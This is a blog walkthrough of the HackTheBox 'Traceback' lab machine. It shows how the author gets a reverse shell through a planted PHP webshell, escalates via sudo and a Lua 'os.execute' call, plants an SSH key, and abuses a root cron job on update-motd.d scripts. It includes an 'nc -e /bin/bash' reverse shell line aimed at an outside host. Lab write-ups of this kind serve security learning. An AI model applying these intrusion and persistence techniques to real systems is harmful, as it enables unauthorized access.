文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-03-24   1.4k

HTB::Traceback Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • pspy
  • gtfobins
  • OSINT
  • SSH with public key

0x03 Pentesting

Initial Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.80 scan initiated Mon Mar 23 10:20:21 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 23 10:21:10 2020 -- 1 IP address (1 host up) scanned in 49.24 seconds

Meanwhile, I ran gobuster and dirb But there is anything interesting for me.

Getting User Access

80 HTTP Website

Hint:Some of the best web shells that you might need ;), Google it

Found a Github repo

Test all webshell filename for url

smevk.php webshell works, and username is admin, password is admin.

Upload php reverse shell script through Code Injector module.

Now I can get a php reverse shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.181] 33430
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$ cd /home/webadmin
$ ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt

在webadmin的主目录主要看两个文件note.txt.bash_history

1
2
3
4
5
6
7
8
9
10
11
12
$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout

应该是利用/home/sysadmin/luvit这个工具执行lua脚本,可以再新建一个privesc.lua脚本,然后模仿.bash_history执行命令

1
2
3
4
5
6
7
8
9
10
11
12
$ echo 'os.execute("/bin/sh")' > privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
cd /home/sysadmin
ls
luvit
user.txt

Get user flag~

Getting Root Access

看了一下HTB Forum上面一些师傅给的提示,用pspy工具监视系统中在执行的程序,发现了一个有意思的地方:

1
2
3
4
5
6
7
8
9
10
11
12
13
2020/03/23 21:11:01 CMD: UID=0    PID=2273   | sleep 30 
2020/03/23 21:11:01 CMD: UID=0 PID=2272 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/03/23 21:11:01 CMD: UID=0 PID=2271 |
2020/03/23 21:11:01 CMD: UID=0 PID=2270 | /usr/sbin/CRON -f
2020/03/23 21:11:01 CMD: UID=0 PID=2269 | /usr/sbin/CRON -f
2020/03/23 21:11:31 CMD: UID=0 PID=2275 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm
/var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
2020/03/23 21:12:02 CMD: UID=0 PID=2281 | sleep 30
2020/03/23 21:12:02 CMD: UID=0 PID=2278 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/03/23 21:12:02 CMD: UID=0 PID=2277 |
2020/03/23 21:12:02 CMD: UID=0 PID=2276 | /usr/sbin/CRON -f
2020/03/23 21:12:32 CMD: UID=0 PID=2282 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm
/var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/

可以看到系统每隔30秒就把/var/backups/.update-motd.d/中的文件都复制到/etc/update-motd.d/,Google一下update-motd.d的作用,发现是每次SSH登录成功后,会执行00-header文件中的命令。现在的问题就是怎么用SSH登录靶机,我找了很久SSH的登录密码,后来才突然想到SSH除了口令登录还可以公钥登录,把本机上的公钥拷贝到靶机的/home/webadmin/.ssh/authorized_keys文件中即可。

顺便把SSH的原理复习一下:https://www.jianshu.com/p/33461b619d53

靶机

1
2
3
4
5
6
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC6zGx1XQHjBj5x5D+qqE+0wml2VnALfbz7D5CpexgNrpEDQTOWCEkIAl1Ftt9FNClzdNk+/NFMWXR8dxRHzOl7aQzMa+njQOzh6VyM34YbCGuGgakDCIrsHu25dAwypvJ7Clp22faDDIw6zJxcx84Ir1XSpUeWZ4Cotk+0gVzwg
LHbstRPxyzxROvcsesx9kd251L3/bWJzC53oNDaSXzMBYV7sdjSlPLeD9zHJ39wr5YaEFwn0vkgPR+VAdlXAOLi98Ttr+FYMsGr8XMbJU06QKZ2ozf6RVjc6RJ5hjgIFbcxV8VCNGM6rBx5FDCZDgnbzu4ITWpWsgBBLu3JndjD+UWkeejLE4K7eR3510W/x4zHF/0TsZicyh/ZJb
ZEo+JefvVKT0WAilaJ2K7w7jDkrPhZO6TheGTDnvLqrEvHObGq70ytpZ6ippsm78/xkwCHu4l03RMd2Zt+7elXOsA/4WsjEvS+CxqlbtTC636+T6T4cTro2GHlO3lAq7oddq0= [email protected] >> /home/webadmin/.ssh/authorized_keys

$ cd /etc/update-motd.d/
$ echo "cat /root/root.txt" >> 00-header

主机(这两个步骤衔接要快)

1
2
3
4
5
6
7
8
9
10
$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land

cf6c[---------------------------]aefc

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

Get root flag~

另外,还可以在91-release-upgrade写一个reverse shell:

1
2
3
4
5
6
7
8
9
#!/bin/sh
/tmp/nc -e /bin/bash 10.10.14.194 2345
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

0x04 Conclusion

0x05 Reference

https://www.hackingarticles.in/fowsniff-1-vulnhub-walkthrough/

https://github.com/DominicBreuker/pspy

https://gtfobins.github.io/gtfobins/lua/

Copyright © ca01h 2019-2020 | 本站总访问量